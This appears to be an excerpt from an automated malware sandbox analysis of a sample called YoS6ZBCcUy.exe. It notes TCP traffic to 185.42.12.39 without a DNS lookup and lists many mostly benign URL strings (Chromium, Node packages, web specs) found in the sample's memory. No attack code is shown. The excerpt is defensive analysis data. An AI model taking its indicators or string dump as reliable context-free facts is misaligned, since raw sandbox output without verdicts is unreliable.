Source: Joe Sandbox View, ASN Name: MULTIHOST-ASRU MULTIHOST-ASRU
Source: unknown, TCP traffic detected without corresponding DNS query: 185.42.12.39
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ploscompbiol.org/static/license
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.polymer-project.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.portaudio.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.softsynth.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.com
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951975329.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sysinternals.comWindowPositionSOFTWARE
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.unicode.org/copyright.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.webrtc.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com/watch?v=I9nDOSGfwZg
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://zlib.net/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://%s:%d/.well-known/masque/udp/%s/%d/Net.QuicStreamFactory.DefaultNetworkMatchNet.QuicSession.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://android.googlesource.com/platform/external/puffin
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.html
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://blog.chromium.org/2019/10/no-more-mixed-messages-about-https.htmlMixed
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://chromestatus.com/feature/5105856067141632.
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2078169826.00000000069A3000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/chromium/src/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/external/github.com/intel/tinycbor.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/vulkan-deps/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebm
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chromium.googlesource.com/webm/libwebp
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/chromium/issues/detail?id=25916
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://code.google.com/p/v8/wiki/JavaScriptStackTraceApi
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://codereview.chromium.org/121173009/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#clear
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#console-namespace
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#count-map
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#countreset
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://console.spec.whatwg.org/#table
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/1038223.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/927119
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/927119Blink.Script.SchedulingTypeScriptLoader
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/981419
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://crbug.com/v8/7848
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://creativecommons.org/licenses/by/3.0/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js?rcl=dd10454c1d
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7231#section-6.4
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://datatracker.ietf.org/doc/html/rfc7238
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/blog/enabling-shared-array-buffer/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/PerformanceResourceTiming
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Equality_comparisons_and_sameness#Loose_equa
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/endsWith
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/includes
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/String/startsWith
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://developers.google.com/android/guides/setup
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/17aTgLnjMXIrfjgNaTUnHQO7m3xgzHR2VXBTmi03Qii4/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#dom-event-stopimmediatepropagation
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#interface-abortcontroller
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://dom.spec.whatwg.org/#interface-eventtarget
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://domenic.me/)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunk
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#encode-and-flush
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textdecoder
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://encoding.spec.whatwg.org/#textencoder
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org/opensource
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://feross.org/support
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-method
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#fetch-timing-info
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#headers-class
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#request-class
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://fetch.spec.whatwg.org/#response-class
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gist.github.com/XVilka/8346728#gistcomment-2823421
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ChromeDevTools/devtools-frontend/blob/4275917f84266ef40613db3c1784a25f902ea74e/fr
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Cyan4973/xxHash
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GPUOpen-LibrariesAndSDKs/VulkanMemoryAllocator
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChrome/web-vitals
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/GoogleChromeLabs/text-fragments-polyfill
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Headers.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/SPIRV-Tools.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Headers
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/KhronosGroup/Vulkan-Loader
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Maratyszcza/pthreadpool
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Nicoshev/rapidhash
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Nicoshev/rapidhash/blob/master/rapidhash.h
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/PortAudio/portaudio/tree/master/src/common
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Raynos/xtend
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ReactiveX/rxjs
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/STRML/async-limiter
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js#readme
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Sebmaster/tr46.js.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/SeleniumHQ/selenium/tree/trunk
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Squirrel/Squirrel.Mac
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TroyGoode)
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.border-boxcontent-bo
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/scheduling-apis
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/shared-element-transitions/blob/main/debugging_overflow_on_images.md.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WICG/view-transitions/blob/main/debugging_overflow_on_images.md
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/esm-integration/issues/42
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/WebAssembly/wasm-c-api/
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/aawc/unrar.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/brailcom/speechd
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brycebaril/node-stream-meter.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/supports-color
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/wrap-ansi?sponsor=1
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/conventional-changelog/standard-version):
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/blob/main/LICENSE.md.
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077475607.00000000061A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/denoland/deno/blob/v1.29.1/ext/crypto/00_crypto.js#L195
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/rc.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dpranke/typ.git
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/etingof/pyasn1
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/zstd
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/queue-microtask
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/run-parallel
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/simple-concat
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/simple-get
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/888438143
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/888438190
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/888438236
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/actions/runs/918633749
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vercel/pkg-fetch/releases/download/
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4805Custom
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/gamepad/pull/120
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/gamepad/pull/120Access
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-features
Source: YoS6ZBCcUy.exe, 00000000.00000003.2077850274.00000000065A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/w3c/webappsec-permissions-policy/blob/master/features.md#sensor-featuresDeviceOri
Source: YoS6ZBCcUy.exe, 00000000.00000003.1934412371.00000000052B0000.00000004.00001000.00020000.00000000.sdmp, YoS6ZBCcUy.exe, 00000000.00000003.2088531041.0000000004755000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/wasdk/wasmparser
Source: YoS6ZBCcUy.exe, 00000000.00000003.1951676559.0000000004DB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws
